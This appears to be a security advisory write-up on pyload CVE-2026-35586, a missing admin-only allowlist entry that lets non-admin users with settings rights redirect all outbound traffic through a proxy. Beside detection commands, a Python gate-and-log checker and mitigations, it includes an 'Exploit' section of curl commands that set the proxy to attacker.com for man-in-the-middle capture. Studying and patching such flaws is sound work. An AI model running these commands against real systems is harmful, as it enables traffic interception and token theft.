pyload, Insecure Allowlist Bypass, CVE-2026-35586 (Critical)


How CVE-2026-35586 works:

The `set_config_value()` API (guarded by `Perms.SETTINGS`) uses a hand-maintained allowlist, `ADMIN_ONLY_CORE_OPTIONS`, to restrict sensitive core settings to administrators. That allowlist includes `("proxy", "username")` and `("proxy", "password")` but misses `("proxy", "enabled")`, `("proxy", "host")`, `("proxy", "port")` and `("proxy", "type")`. Any authenticated non-admin user holding the `SETTINGS` permission can therefore call `setConfigValue` to enable proxying and point all outbound traffic at an attacker-controlled host. The proxy configuration is read in `src/pyload/core/network/request_factory.py:82-100` and applied to every new pycurl handle in `http_request.py` (lines 211–230), with no restart required. Because the attacker controls the proxy endpoint, the gated proxy credentials are irrelevant. The result is a full MitM: every download, captcha fetch, update check and plugin HTTP call is routed through the attacker, who can steal tokens, inject responses and, by chaining with `general.ssl_verify=off` (settable under the same permission), bypass HTTPS verification.

DailyCVE Form:

Platform: `pyload`
Version: `0.5.x` (all before patch)
Vulnerability: `Proxy redirect via SETTINGS`
Severity: `Critical`
Date: `2026-04-15` (approximate disclosure)

Prediction: `Patch within 2 weeks`

What Undercode Say:

Verify missing allowlist entries
grep -A 20 "ADMIN_ONLY_CORE_OPTIONS" src/pyload/core/api/__init__.py | grep -E "proxy.(enabled|host|port|type)"
Monitor set_config_value calls in logs
grep "setConfigValue.proxy" /var/log/pyload/pyload.log
List users with SETTINGS permission
sqlite3 pyload.db "SELECT * FROM users WHERE perms LIKE '%SETTINGS%';"

Exploit:

Login as non-admin SETTINGS user
curl -c cookies.txt -X POST http://target:8000/api/login -d 'username=settings_user&password=pass'
Set malicious proxy
for kv in 'category=proxy&option=enabled&value=True' \
'category=proxy&option=host&value=attacker.com' \
'category=proxy&option=port&value=8080' \
'category=proxy&option=type&value=http'; do
curl -b cookies.txt -X POST http://target:8000/api/setConfigValue -d "$kv&section=core"
done
Trigger any download, capture full request on attacker.com:8080

Protection from this CVE:

  • Upgrade pyload to a version that includes `("proxy", "enabled")`, `("proxy", "host")`, `("proxy", "port")` and `("proxy", "type")` in `ADMIN_ONLY_CORE_OPTIONS`.
  • Restrict `Perms.SETTINGS` to trusted admin users only.
  • Monitor `setConfigValue` calls for unexpected proxy changes.
  • Add outbound firewall rules that block connections to unexpected proxy ports.
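As an added check (not pyload's own code) covering the incomplete allowlist described under "How CVE-2026-35586 works" and the monitoring advice in the protection list above: it models the per-option gate beside a section-level gate that cannot miss a proxy option, lists which sensitive options each gate leaves writable, and flags config writes in sample log lines. The two listed tuples and the option names come from the write-up; the function names, `SENSITIVE_CORE_OPTIONS`, the log line format and the sample log lines are assumptions constructed here.

```python
# Added example, not pyload's own code. The allowlist tuples and option
# names follow the write-up; function names, SENSITIVE_CORE_OPTIONS, the
# log line shape and SAMPLE_LOG are assumptions constructed for illustration.
import re

# Hand-maintained allowlist as described: only the proxy credentials are gated.
ADMIN_ONLY_CORE_OPTIONS = {("proxy", "username"), ("proxy", "password")}

# Every proxy option named in the write-up plus the ssl_verify chaining target.
SENSITIVE_CORE_OPTIONS = {
    ("proxy", o) for o in ("enabled", "host", "port", "type", "username", "password")
} | {("general", "ssl_verify")}

def vulnerable_is_admin_only(section, option):
    """Per-option allowlist: anything not listed is writable with SETTINGS."""
    return (section, option) in ADMIN_ONLY_CORE_OPTIONS

def hardened_is_admin_only(section, option):
    """Gate the whole proxy section plus every listed sensitive tuple, so a
    proxy option that is not spelled out cannot fall outside the allowlist."""
    return section == "proxy" or (section, option) in SENSITIVE_CORE_OPTIONS

def missing_admin_gates(check=vulnerable_is_admin_only):
    """Sensitive options a SETTINGS-only user could still change under `check`."""
    return sorted(opt for opt in SENSITIVE_CORE_OPTIONS if not check(*opt))

# Detection. Assumed line shape: "... setConfigValue <section>.<option>=<value> by <user>".
LOG_RE = re.compile(
    r"setConfigValue\s+(?P<section>\w+)\.(?P<option>\w+)=(?P<value>\S*)\s+by\s+(?P<user>\w+)"
)

# Constructed sample lines; the second and third are writes worth alerting on.
SAMPLE_LOG = [
    "2026-04-15 10:01:02 INFO setConfigValue download.max_connections=4 by settings_user",
    "2026-04-15 10:02:11 INFO setConfigValue proxy.host=198.51.100.7 by settings_user",
    "2026-04-15 10:02:12 INFO setConfigValue general.ssl_verify=off by settings_user",
]

def suspicious_config_writes(lines):
    """Return (user, section.option, value) for writes that touch gated options."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and hardened_is_admin_only(m["section"], m["option"]):
            hits.append((m["user"], f"{m['section']}.{m['option']}", m["value"]))
    return hits
```

Running `missing_admin_gates()` against the original gate returns the four proxy options plus `general.ssl_verify`; against `hardened_is_admin_only` it returns nothing.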

Impact:

  • Full interception of all outbound HTTP/HTTPS traffic (URLs, headers, cookies, bodies).
  • Theft of download-site session tokens and bearer tokens.
  • Arbitrary response injection → poisoned archives, malicious captcha solvers, fake updates.
  • Chaining with `general.ssl_verify=off` enables MitM for HTTPS with forged certificates.
  • No restart required; takes effect immediately on next outbound request.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
